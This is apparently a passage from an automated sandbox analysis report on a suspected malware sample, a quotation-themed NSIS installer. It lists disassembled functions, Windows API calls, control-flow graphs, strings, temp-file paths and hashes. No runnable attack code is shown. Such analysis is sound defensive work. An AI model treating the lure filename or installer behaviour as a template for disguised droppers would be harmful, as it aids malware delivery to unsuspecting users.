                                                                                • FindFirstFileA.KERNELBASE(75DF3410,00421580,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00405A06,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp,75DF3410,?,75DF2EE0,00405725,?,75DF3410,75DF2EE0), ref: 00406172
                                                                                • FindClose.KERNEL32(00000000), ref: 0040617E
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp, xrefs: 00406167
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Find$CloseFileFirst
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp
                                                                                • API String ID: 2295610775-2551829887
                                                                                • Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                • Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
                                                                                • Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
                                                                                • Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED
                                                                                Function 00403B75 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 179 403b75-403b87 180 403cc8-403cd7 179->180 181 403b8d-403b93 179->181 183 403d26-403d3b 180->183 184 403cd9-403d21 GetDlgItem * 2 call 404048 SetClassLongA call 40140b 180->184 181->180 182 403b99-403ba2 181->182 187 403ba4-403bb1 SetWindowPos 182->187 188 403bb7-403bba 182->188 185 403d7b-403d80 call 404094 183->185 186 403d3d-403d40 183->186 184->183 198 403d85-403da0 185->198 190 403d42-403d4d call 401389 186->190 191 403d73-403d75 186->191 187->188 193 403bd4-403bda 188->193 194 403bbc-403bce ShowWindow 188->194 190->191 212 403d4f-403d6e SendMessageA 190->212 191->185 197 404015 191->197 199 403bf6-403bf9 193->199 200 403bdc-403bf1 DestroyWindow 193->200 194->193 207 404017-40401e 197->207 205 403da2-403da4 call 40140b 198->205 206 403da9-403daf 198->206 202 403bfb-403c07 SetWindowLongA 199->202 203 403c0c-403c12 199->203 208 403ff2-403ff8 200->208 202->207 210 403cb5-403cc3 call 4040af 203->210 211 403c18-403c29 GetDlgItem 203->211 205->206 215 403fd3-403fec DestroyWindow EndDialog 206->215 216 403db5-403dc0 206->216 208->197 213 403ffa-404000 208->213 210->207 217 403c48-403c4b 211->217 218 403c2b-403c42 SendMessageA IsWindowEnabled 211->218 212->207 213->197 220 404002-40400b ShowWindow 213->220 215->208 216->215 221 403dc6-403e13 call 405e85 call 404048 * 3 GetDlgItem 216->221 222 403c50-403c53 217->222 223 403c4d-403c4e 217->223 218->197 218->217 220->197 249 403e15-403e1a 221->249 250 403e1d-403e59 ShowWindow KiUserCallbackDispatcher call 40406a EnableWindow 221->250 228 403c61-403c66 222->228 229 403c55-403c5b 222->229 227 403c7e-403c83 call 404021 223->227 227->210 232 403c9c-403caf SendMessageA 228->232 234 403c68-403c6e 228->234 229->232 233 403c5d-403c5f 229->233 232->210 233->227 237 403c70-403c76 call 40140b 234->237 238 403c85-403c8e call 40140b 234->238 247 403c7c 237->247 238->210 246 403c90-403c9a 238->246 246->247 247->227 249->250 253 403e5b-403e5c 250->253 254 403e5e 250->254 255 403e60-403e8e GetSystemMenu EnableMenuItem SendMessageA 253->255 254->255 256 403e90-403ea1 SendMessageA 255->256 257 403ea3 255->257 258 403ea9-403ee2 call 40407d call 405e63 lstrlenA call 405e85 SetWindowTextA call 401389 256->258 257->258 258->198 267 403ee8-403eea 258->267 267->198 268 403ef0-403ef4 267->268 269 403f13-403f27 DestroyWindow 268->269 270 403ef6-403efc 268->270 269->208 272 403f2d-403f5a CreateDialogParamA 269->272 270->197 271 403f02-403f08 270->271 271->198 274 403f0e 271->274 272->208 273 403f60-403fb7 call 404048 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 272->273 273->197 279 403fb9-403fcc ShowWindow call 404094 273->279 274->197 281 403fd1 279->281 281->208
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
                                                                                • ShowWindow.USER32(?), ref: 00403BCE
                                                                                • DestroyWindow.USER32 ref: 00403BE2
                                                                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
                                                                                • GetDlgItem.USER32(?,?), ref: 00403C1F
                                                                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403C3A
                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403CE8
                                                                                • GetDlgItem.USER32(?,00000002), ref: 00403CF2
                                                                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
                                                                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
                                                                                • GetDlgItem.USER32(?,00000003), ref: 00403E03
                                                                                • ShowWindow.USER32(00000000,?), ref: 00403E24
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
                                                                                • EnableWindow.USER32(?,?), ref: 00403E51
                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
                                                                                • EnableMenuItem.USER32(00000000), ref: 00403E6E
                                                                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
                                                                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
                                                                                • lstrlenA.KERNEL32(ldreboligblokkene: Installing,?,ldreboligblokkene: Installing,00422F20), ref: 00403EC2
                                                                                • SetWindowTextA.USER32(?,ldreboligblokkene: Installing), ref: 00403ED1
                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404005
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                • String ID: ldreboligblokkene: Installing
                                                                                • API String ID: 3282139019-2674460088
                                                                                • Opcode ID: 14643a446020e11c7db6c0000c70220a6a3735e766a8ea02bbcbfaa8d9760bc8
                                                                                • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                                                • Opcode Fuzzy Hash: 14643a446020e11c7db6c0000c70220a6a3735e766a8ea02bbcbfaa8d9760bc8
                                                                                • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E
                                                                                Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 282 4037e3-4037fb call 4061fc 285 4037fd-40380d call 405dc1 282->285 286 40380f-403840 call 405d4a 282->286 294 403863-40388c call 403aa8 call 4059c3 285->294 291 403842-403853 call 405d4a 286->291 292 403858-40385e lstrcatA 286->292 291->292 292->294 300 403892-403897 294->300 301 403913-40391b call 4059c3 294->301 300->301 302 403899-4038b1 call 405d4a 300->302 307 403929-40394e LoadImageA 301->307 308 40391d-403924 call 405e85 301->308 306 4038b6-4038bd 302->306 306->301 309 4038bf-4038c1 306->309 311 403950-403980 RegisterClassA 307->311 312 4039cf-4039d7 call 40140b 307->312 308->307 316 4038d2-4038de lstrlenA 309->316 317 4038c3-4038d0 call 405900 309->317 313 403986-4039ca SystemParametersInfoA CreateWindowExA 311->313 314 403a9e 311->314 324 4039e1-4039ec call 403aa8 312->324 325 4039d9-4039dc 312->325 313->312 322 403aa0-403aa7 314->322 318 4038e0-4038ee lstrcmpiA 316->318 319 403906-40390e call 4058d5 call 405e63 316->319 317->316 318->319 323 4038f0-4038fa GetFileAttributesA 318->323 319->301 328 403900-403901 call 40591c 323->328 329 4038fc-4038fe 323->329 335 4039f2-403a0c ShowWindow call 40618e 324->335 336 403a75-403a76 call 40514e 324->336 325->322 328->319 329->319 329->328 343 403a18-403a2a GetClassInfoA 335->343 344 403a0e-403a13 call 40618e 335->344 339 403a7b-403a7d 336->339 341 403a97-403a99 call 40140b 339->341 342 403a7f-403a85 339->342 341->314 342->325 345 403a8b-403a92 call 40140b 342->345 348 403a42-403a65 DialogBoxParamA call 40140b 343->348 349 403a2c-403a3c GetClassInfoA RegisterClassA 343->349 344->343 345->325 352 403a6a-403a73 call 403733 348->352 349->348 352->322
                                                                                APIs
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • lstrcatA.KERNEL32(1033,ldreboligblokkene: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ldreboligblokkene: Installing,00000000,00000002,75DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe",00000000), ref: 0040385E
                                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer,1033,ldreboligblokkene: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,ldreboligblokkene: Installing,00000000,00000002,75DF3410), ref: 004038D3
                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                                                • GetFileAttributesA.KERNEL32(Call), ref: 004038F1
                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer), ref: 0040393A
                                                                                  • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                                                • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$ldreboligblokkene: Installing
                                                                                • API String ID: 1975747703-1659292090
                                                                                • Opcode ID: 3a9e2f3f5c19ce4247f0d6069029edff0a4c8d27484f6fe16965c6ded75fffd5
                                                                                • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                                                • Opcode Fuzzy Hash: 3a9e2f3f5c19ce4247f0d6069029edff0a4c8d27484f6fe16965c6ded75fffd5
                                                                                • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D
                                                                                Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 356 402cb6-402d04 GetTickCount GetModuleFileNameA call 405ad6 359 402d10-402d3e call 405e63 call 40591c call 405e63 GetFileSize 356->359 360 402d06-402d0b 356->360 368 402d44-402d5b 359->368 369 402e2e-402e3c call 402c17 359->369 361 402f55-402f59 360->361 371 402d5d 368->371 372 402d5f-402d6c call 4031cd 368->372 376 402e42-402e45 369->376 377 402f0d-402f12 369->377 371->372 378 402d72-402d78 372->378 379 402ec9-402ed1 call 402c17 372->379 380 402e71-402ebd GlobalAlloc call 4062df call 405b05 CreateFileA 376->380 381 402e47-402e5f call 4031e3 call 4031cd 376->381 377->361 382 402df8-402dfc 378->382 383 402d7a-402d92 call 405a91 378->383 379->377 407 402ed3-402f03 call 4031e3 call 402f5c 380->407 408 402ebf-402ec4 380->408 381->377 404 402e65-402e6b 381->404 391 402e05-402e0b 382->391 392 402dfe-402e04 call 402c17 382->392 383->391 401 402d94-402d9b 383->401 394 402e0d-402e1b call 406271 391->394 395 402e1e-402e28 391->395 392->391 394->395 395->368 395->369 401->391 406 402d9d-402da4 401->406 404->377 404->380 406->391 409 402da6-402dad 406->409 416 402f08-402f0b 407->416 408->361 409->391 411 402daf-402db6 409->411 411->391 413 402db8-402dd8 411->413 413->377 415 402dde-402de2 413->415 417 402de4-402de8 415->417 418 402dea-402df2 415->418 416->377 419 402f14-402f25 416->419 417->369 417->418 418->391 422 402df4-402df6 418->422 420 402f27 419->420 421 402f2d-402f32 419->421 420->421 423 402f33-402f39 421->423 422->391 423->423 424 402f3b-402f53 call 405a91 423->424 424->361
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402CCA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,00000400), ref: 00402CE6
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe,80000000,00000003), ref: 00402D2F
                                                                                • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76
                                                                                Strings
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
                                                                                • Null, xrefs: 00402DAF
                                                                                • Inst, xrefs: 00402D9D
                                                                                • C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                                                • C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C
                                                                                • Error launching installer, xrefs: 00402D06
                                                                                • soft, xrefs: 00402DA6
                                                                                • "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe", xrefs: 00402CB6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: "C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-2938456903
                                                                                • Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                                                • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                                                • Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
                                                                                • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C
                                                                                Function 00405E85 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 427 405e85-405e90 428 405e92-405ea1 427->428 429 405ea3-405eb8 427->429 428->429 430 4060ab-4060af 429->430 431 405ebe-405ec9 429->431 432 4060b5-4060bf 430->432 433 405edb-405ee5 430->433 431->430 434 405ecf-405ed6 431->434 435 4060c1-4060c5 call 405e63 432->435 436 4060ca-4060cb 432->436 433->432 437 405eeb-405ef2 433->437 434->430 435->436 439 405ef8-405f2d 437->439 440 40609e 437->440 441 405f33-405f3e GetVersion 439->441 442 406048-40604b 439->442 443 4060a0-4060a6 440->443 444 4060a8-4060aa 440->444 445 405f40-405f44 441->445 446 405f58 441->446 447 40607b-40607e 442->447 448 40604d-406050 442->448 443->430 444->430 445->446 449 405f46-405f4a 445->449 452 405f5f-405f66 446->452 453 406080-406087 call 405e85 447->453 454 40608c-40609c lstrlenA 447->454 450 406060-40606c call 405e63 448->450 451 406052-40605e call 405dc1 448->451 449->446 455 405f4c-405f50 449->455 465 406071-406077 450->465 451->465 457 405f68-405f6a 452->457 458 405f6b-405f6d 452->458 453->454 454->430 455->446 461 405f52-405f56 455->461 457->458 463 405fa6-405fa9 458->463 464 405f6f-405f8a call 405d4a 458->464 461->452 468 405fb9-405fbc 463->468 469 405fab-405fb7 GetSystemDirectoryA 463->469 473 405f8f-405f92 464->473 465->454 467 406079 465->467 474 406040-406046 call 4060ce 467->474 471 406026-406028 468->471 472 405fbe-405fcc GetWindowsDirectoryA 468->472 470 40602a-40602d 469->470 470->474 477 40602f-406033 470->477 471->470 475 405fce-405fd8 471->475 472->471 476 405f98-405fa1 call 405e85 473->476 473->477 474->454 480 405ff2-406008 SHGetSpecialFolderLocation 475->480 481 405fda-405fdd 475->481 476->470 477->474 483 406035-40603b lstrcatA 477->483 485 406023 480->485 486 40600a-406021 SHGetPathFromIDListA CoTaskMemFree 480->486 481->480 484 405fdf-405fe6 481->484 483->474 488 405fee-405ff0 484->488 485->471 486->470 486->485 488->470 488->480
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,004050B4,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000), ref: 00405F36
                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405FB1
                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405FC4
                                                                                • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 0040600E
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00406019
                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
                                                                                • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,004050B4,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000), ref: 0040608D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 900638850-1772671590
                                                                                • Opcode ID: 74d77ce8cc9b213a62b7930c3515ad840f0844bbbd5d23fc59da94e497b23fcc
                                                                                • Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
                                                                                • Opcode Fuzzy Hash: 74d77ce8cc9b213a62b7930c3515ad840f0844bbbd5d23fc59da94e497b23fcc
                                                                                • Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E
                                                                                Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,00000031), ref: 00401790
                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\forskningsafdelingers\Dispergerer\Nondefinite\Fordelte,00000000,00000000,00000031), ref: 004017BA
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00402C8E,00402C8E,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl9DD3.tmp\System.dll), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.38290357022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.38290259884.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290450253.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290508326.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.38290706883.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_z1QuotationSheetVSAA6656776.jbxd
